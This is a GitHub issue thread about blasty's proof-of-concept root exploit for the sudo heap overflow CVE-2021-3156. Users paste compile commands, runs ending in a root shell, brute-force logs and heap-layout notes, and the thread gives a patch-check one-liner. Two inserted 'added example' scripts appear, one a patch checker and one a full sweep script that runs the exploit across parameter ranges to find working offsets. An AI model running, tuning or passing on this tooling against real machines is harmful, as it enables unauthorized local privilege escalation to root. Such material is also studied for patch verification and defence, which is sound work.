blasty / CVE-2021-3156


Not working on my focal #1

Open LyesH4ck opened 3 years ago

LyesH4ck commented 3 years ago

Hello,

Tested on my fresh install of focal.

```
user@ubuntu20:~/TEST/CVE-2021-3156$ ldd --version
ldd (Ubuntu GLIBC 2.31-0ubuntu9) 2.31
Copyright (C) 2020 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

user@ubuntu20:~/TEST/CVE-2021-3156$ uname -a
Linux ubuntu20 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux

user@ubuntu20:~/TEST/CVE-2021-3156$ ls
hax.c  lib.c  libnss_X  Makefile  README.md  sudo-hax-me-a-sandwich
user@ubuntu20:~/TEST/CVE-2021-3156$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty peter@haxx.in

using target: 'Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31'
pray for your rootshell..
free(): invalid pointer
Aborted (core dumped)

user@ubuntu20:~/TEST/CVE-2021-3156$ cat /etc/issue
Ubuntu 20.04.1 LTS \n \l

user@ubuntu20:~/TEST/CVE-2021-3156$ /usr/bin/sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31
```

I've tested your fuzz2.py but I'm not able to crash in process_hooks_getenv() or in nss_load_library()... I only found an interesting crash in set_cmnd()...

blasty commented 3 years ago

Can you try adding a test user to your system and running the exploit from that? I've seen issues where a user who's already privileged to use sudo makes the exploit fail.

transparentdata243 commented 3 years ago

Same issue here. The environment is the same as above. I used a test user which is not in the sudoers list.

LyesH4ck commented 3 years ago

> Can you try adding a test user to your system and run the exploit from that? I've seen issues where a user who's already privileged to use sudo make the exploit fail.

```
test@ubuntu20:~/CVE-2021-3156$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty peter@haxx.in

using target: 'Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31'
pray for your rootshell..
[+] bl1ng bl1ng! We got it!
```

Ok it works ;)

When I use your fuzz2.py, I can't find a good crash in nss_load_library() or in process_hook_getenv(). Is that normal? Maybe there is something I don't understand. I found a crash in set_cmnd()... the only interesting way I found.

Any hint ?

Thank you!

blasty commented 3 years ago

@Lyes06 Good to see you could get it working with a different user! fuzz2.py must be run as a user who has sudo rights (if you look in the script you can see it invokes sudo env -i ...). You have to be lucky to get some "nice" crashes with this fuzzer. I might rewrite that thing eventually, it can be made better(tm).

PixiesPixel commented 3 years ago

It also doesn't work on my ubuntu 20.04

```
$ ./sudo-hax-me-a-sandwich

** CVE-2021-3156 PoC by blasty peter@haxx.in

usage: ./sudo-hax-me-a-sandwich

available targets:

  0) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
  1) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28

$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty peter@haxx.in

using target: 'Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31'
pray for your rootshell..
usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ...
$ id -a
uid=1001(test) gid=1001(test) groups=1001(test)
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 20.04.1 LTS
Release:        20.04
Codename:       focal
```

LyesH4ck commented 3 years ago

> It also doesn't work on my ubuntu 20.04
>
> ```
> $ ./sudo-hax-me-a-sandwich
>
> ** CVE-2021-3156 PoC by blasty peter@haxx.in
>
> usage: ./sudo-hax-me-a-sandwich
>
> available targets:
>
>   0) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
>   1) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28
>
> $ ./sudo-hax-me-a-sandwich 0
>
> ** CVE-2021-3156 PoC by blasty peter@haxx.in
>
> using target: 'Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31'
> pray for your rootshell..
> usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ...
> $ id -a
> uid=1001(test) gid=1001(test) groups=1001(test)
> $ lsb_release -a
> No LSB modules are available.
> Distributor ID: Ubuntu
> Description:    Ubuntu 20.04.1 LTS
> Release:        20.04
> Codename:       focal
> ```

You get the usage message, so I think your Ubuntu is patched.

Try this:

```sh
sudoedit -s '\' `perl -e 'print "A" x 65536'`
```

If you get usage information, you are patched.
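
The probe above (the same one-liner Qualys published with their advisory) wrapped in a script that classifies the outcome by exit status instead of by eye. This is an added example, not code from blasty's repository or from anyone in this thread. Assumptions: `/usr/bin/sudoedit` and `perl` are present (`SUDOEDIT=...` overrides the path), it is run as an unprivileged user, and the function names and the `--run` flag are mine.

```shell
#!/bin/sh
# Added example (not from blasty's repository or this thread): behavioural
# check for CVE-2021-3156. Assumes /usr/bin/sudoedit and perl exist; run as an
# unprivileged user. SUDOEDIT may be set to point at another sudoedit binary.

# Classify a probe run from its shell exit status and captured output.
# 139 = killed by SIGSEGV, 134 = SIGABRT from glibc's heap checks: the lone
# backslash made set_cmnd() step over the argument's NUL terminator and keep
# copying the following argument and environment into the heap buffer
# user_args, so this sudo is vulnerable. A "usage: sudoedit" line means the
# patched argument parser refused "-s" in sudoedit mode. Anything else is
# reported as unknown and should be looked at by hand.
classify_probe() {
    status=$1
    output=$2
    case "$status" in
        139|134) echo vulnerable ;;
        *)
            if printf '%s\n' "$output" | grep -q '^usage: sudoedit'; then
                echo patched
            else
                echo unknown
            fi
            ;;
    esac
}

# Run the probe: "-s" selects shell mode, the first argument is a single
# backslash, and the second is 64 KiB of 'A' so the out-of-bounds copy is
# large enough to crash a vulnerable sudo instead of corrupting a few bytes.
run_probe() {
    sudoedit_bin=${SUDOEDIT:-/usr/bin/sudoedit}
    pad=$(perl -e 'print "A" x 65536')
    out=$("$sudoedit_bin" -s '\' "$pad" </dev/null 2>&1)
    status=$?
    classify_probe "$status" "$out"
}

# Only run the probe when invoked with --run so the file can also be sourced.
if [ "${1:-}" = --run ]; then
    echo "CVE-2021-3156: $(run_probe)"
fi
```

Run it with `sh check.sh --run`. Because the check is behavioural it is not fooled by distribution backports that keep the `1.8.31` version string, which is why the thread relies on this probe rather than on `sudo --version`.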

PixiesPixel commented 3 years ago

I haven't patched it recently, but you may be right.

```
$ sudoedit -s '' `perl -e 'print "A" x 65536'`
usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ...
```

LyesH4ck commented 3 years ago

> I haven't patched it recently, but you may be right.
>
> ```
> $ sudoedit -s '' `perl -e 'print "A" x 65536'`
> usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ...
> ```

I confirm, you are patched :) Try reinstalling the old sudo packages if you want to play with it ;)

LyesH4ck commented 3 years ago

I deleted my last post to explain again the problem.

- Compilation with make, no -DBRUTE option:

```
$ make
rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0PSH3LLZ .so.2' lib.c

$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty peter@haxx.in

using target: Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
pray for your rootshell..
[+] bl1ng bl1ng! We got it!
#
```

- When I use the options used in brute.sh:

```
$ make brute
rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0PSH3LLZ .so.2' lib.c
gcc -DBRUTE -fPIC -shared -o 'libnss_X/P0PSH3LLZ .so.2' lib.c

$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty peter@haxx.in

using target: Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
pray for your rootshell..
[+] bl1ng bl1ng! We got it!
[sudo] password for test:
```

And when we are using just the printf() in lib.c, brute.sh freezes and then stops, but I don't know why...

LyesH4ck commented 3 years ago

- When the sploit works:

```
using target: Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
pray for your rootshell..
[+] bl1ng bl1ng! We got it!
#
```

```
$ ./brute.sh 50 60 50 70 200 220
[+] cleaning up..
rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0PSH3LLZ .so.2' lib.c
gcc -DBRUTE -fPIC -shared -o 'libnss_X/P0PSH3LLZ .so.2' lib.c
[+] generating possibilities..
[+] lets go..

Computers / CPU cores / Max jobs to run
1:local / 2 / 4

Computer:jobs running/jobs completed/%of started jobs/Average seconds to complete
ETA: 0s Left: 693 AVG: 0.00s  local:4/0/100%/0.0s NOPE
./brute.sh: line 13: 292375 Aborted                 ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 0s Left: 692 AVG: 0.00s  local:4/1/100%/1.0s NOPE
./brute.sh: line 13: 292361 Aborted                 ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 0s Left: 691 AVG: 0.00s  local:4/2/100%/0.5s NOPE
./brute.sh: line 13: 292368 Aborted                 ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 0s Left: 690 AVG: 0.00s  local:4/3/100%/0.3s NOPE
./brute.sh: line 13: 292369 Aborted                 ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 0s Left: 689 AVG: 0.00s  local:4/4/100%/0.2s NOPE
.......
.......
ETA: 0s Left: 4 AVG: 0.12s  local:4/689/100%/0.1s NOPE
./brute.sh: line 13: 309687 Aborted                 ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 0s Left: 3 AVG: 0.12s  local:3/690/100%/0.1s NOPE
./brute.sh: line 13: 309721 Aborted                 ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 0s Left: 2 AVG: 0.12s  local:2/691/100%/0.1s NOPE
./brute.sh: line 13: 309737 Aborted                 ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 0s Left: 1 AVG: 0.12s  local:1/692/100%/0.1s NOPE
./brute.sh: line 13: 309762 Aborted                 ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 0s Left: 0 AVG: 0.12s  local:0/693/100%/0.1s
[+] done
[-] we didnt find any working candidates :(
```

LyesH4ck commented 3 years ago

I modified your script brute.sh and deleted the /2 used in the script. Now it works, but it freezes (ETA: 7287s). I need to Ctrl-C to finish the execution. I don't know why the script is freezing...

```
ETA: 56s Left: 454 AVG: 0.13s  local:4/239/100%/0.1s NOPE
./brute.sh: line 13: 354756 Segmentation fault      ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN
ETA: 7287s Left: 450 AVG: 16.20s  local:4/243/100%/16.2s
^C
[sudo] password for test: [sudo] password for test: [sudo] password for test: [sudo] password for test:
[+] done
[+] we found some goodies (saved in success.txt):

** CVE-2021-3156 PoC by blasty peter@haxx.in

using target: Manual ['/usr/bin/sudoedit'] (52, 52, 69, 200)
pray for your rootshell..
[+] bl1ng bl1ng! We got it!

** CVE-2021-3156 PoC by blasty peter@haxx.in

using target: Manual ['/usr/bin/sudoedit'] (52, 52, 69, 210)
pray for your rootshell..
[+] bl1ng bl1ng! We got it!

** CVE-2021-3156 PoC by blasty peter@haxx.in

using target: Manual ['/usr/bin/sudoedit'] (52, 52, 69, 220)
pray for your rootshell..
[+] bl1ng bl1ng! We got it!

** CVE-2021-3156 PoC by blasty peter@haxx.in

using target: Manual ['/usr/bin/sudoedit'] (52, 53, 68, 200)
pray for your rootshell..
[+] bl1ng bl1ng! We got it!

** CVE-2021-3156 PoC by blasty peter@haxx.in

using target: Manual ['/usr/bin/sudoedit'] (52, 53, 68, 210)
pray for your rootshell..
[+] bl1ng bl1ng! We got it!

** CVE-2021-3156 PoC by blasty peter@haxx.in

using target: Manual ['/usr/bin/sudoedit'] (52, 53, 68, 220)
pray for your rootshell..
[+] bl1ng bl1ng! We got it!
```
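
A sequential sweep over the four manual parameters (ALEN BLEN NLEN LCLEN) that the brute.sh runs quoted above pass to `./sudo-hax-me-a-sandwich`, written so that a candidate which ends at a `[sudo] password for ...` prompt is reported and skipped rather than left hanging. This is an added example, not blasty's brute.sh and not posted by anyone in this thread. Assumptions: the PoC binary accepts the four numbers as arguments and prints `[+] bl1ng bl1ng! We got it!` on success (both visible in the output above); `POC_BIN`, `SUCCESS_FILE`, the ranges, the LCLEN step and the function names are mine.

```shell
#!/bin/sh
# Added example (not blasty's brute.sh): one-process-at-a-time sweep over the
# Manual parameters of ./sudo-hax-me-a-sandwich. Each candidate is run under
# timeout(1) and, where available, setsid(1) so that sudoedit has no
# controlling terminal to read a password from: a run that survives the
# overflow and reaches authentication then fails immediately instead of
# blocking the sweep. POC_BIN and SUCCESS_FILE are assumed names.

POC_BIN=${POC_BIN:-./sudo-hax-me-a-sandwich}
SUCCESS_FILE=${SUCCESS_FILE:-success.txt}

# Classify one run from its captured output. "We got it" is the PoC's success
# banner; a "[sudo] password for" line means the overflow did not hijack
# execution and sudoedit fell through to authentication; anything else (NOPE,
# abort, segfault, timeout) is a miss.
classify_run() {
    case "$1" in
        *"We got it"*)    echo hit ;;
        *"password for"*) echo prompt ;;
        *)                echo nope ;;
    esac
}

# Run a command with a kill timeout and, if setsid is available, in a new
# session without a controlling terminal. stdin is /dev/null for the same
# reason: nothing the child does should be able to wait for input.
run_guarded() {
    if command -v setsid >/dev/null 2>&1; then set -- setsid -w "$@"; fi
    if command -v timeout >/dev/null 2>&1; then set -- timeout -k 1 5 "$@"; fi
    "$@" </dev/null 2>&1
}

# Try one (ALEN, BLEN, NLEN, LCLEN) tuple and print its classification.
try_candidate() {
    out=$(run_guarded "$POC_BIN" "$1" "$2" "$3" "$4") || true
    classify_run "$out"
}

# sweep A_MIN A_MAX B_MIN B_MAX N_MIN N_MAX LC_MIN LC_MAX LC_STEP
# Inclusive ranges; every hit is appended to SUCCESS_FILE as "A B N LC".
sweep() {
    a=$1
    while [ "$a" -le "$2" ]; do
        b=$3
        while [ "$b" -le "$4" ]; do
            n=$5
            while [ "$n" -le "$6" ]; do
                lc=$7
                while [ "$lc" -le "$8" ]; do
                    r=$(try_candidate "$a" "$b" "$n" "$lc")
                    case "$r" in
                        hit)    echo "$a $b $n $lc" >>"$SUCCESS_FILE"
                                echo "[+] hit: $a $b $n $lc" ;;
                        prompt) echo "[-] $a $b $n $lc reached the password prompt" ;;
                    esac
                    lc=$((lc + $9))
                done
                n=$((n + 1))
            done
            b=$((b + 1))
        done
        a=$((a + 1))
    done
}

# Example invocation (the ranges are assumptions): sh sweep.sh --run
if [ "${1:-}" = --run ]; then
    : >"$SUCCESS_FILE"
    sweep 50 60 50 70 60 70 200 220 10
    echo "[+] done; hits (if any) are in $SUCCESS_FILE"
fi
```

The sweep is deliberately sequential: the PoC's heap layout depends on the process environment, and running many copies in parallel is one more variable when a tuple that worked once cannot be reproduced.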

sha0coder commented 3 years ago

Same vagrant ubuntu/focal64, same libc + sudo version (manually compiled), and it doesn't work; it doesn't even seem exploitable: the "@CCCCC" buffers are far from the "systemd" and other service_user structures (0x1000 at the nearest). The user_args malloc fits well in the previous free but it's still very far. I have friends who hit the same situation. Using non-sudoers users also doesn't work for me. Probably the exploitation depends on other factors: RAM? locales? etc. Blasty, does that make sense?

jm33-m0 commented 3 years ago

> Same vagrant ubuntu/focal64, same libc + sudo version (manually compiled), and it doesn't work; it doesn't even seem exploitable: the "@ccccc" buffers are far from the "systemd" and other service_user structures (0x1000 at the nearest). The user_args malloc fits well in the previous free but it's still very far. I have friends who hit the same situation. Using non-sudoers users also doesn't work for me. Probably the exploitation depends on other factors: RAM? locales? etc. Blasty, does that make sense?

Same here, no luck with manually compiled sudo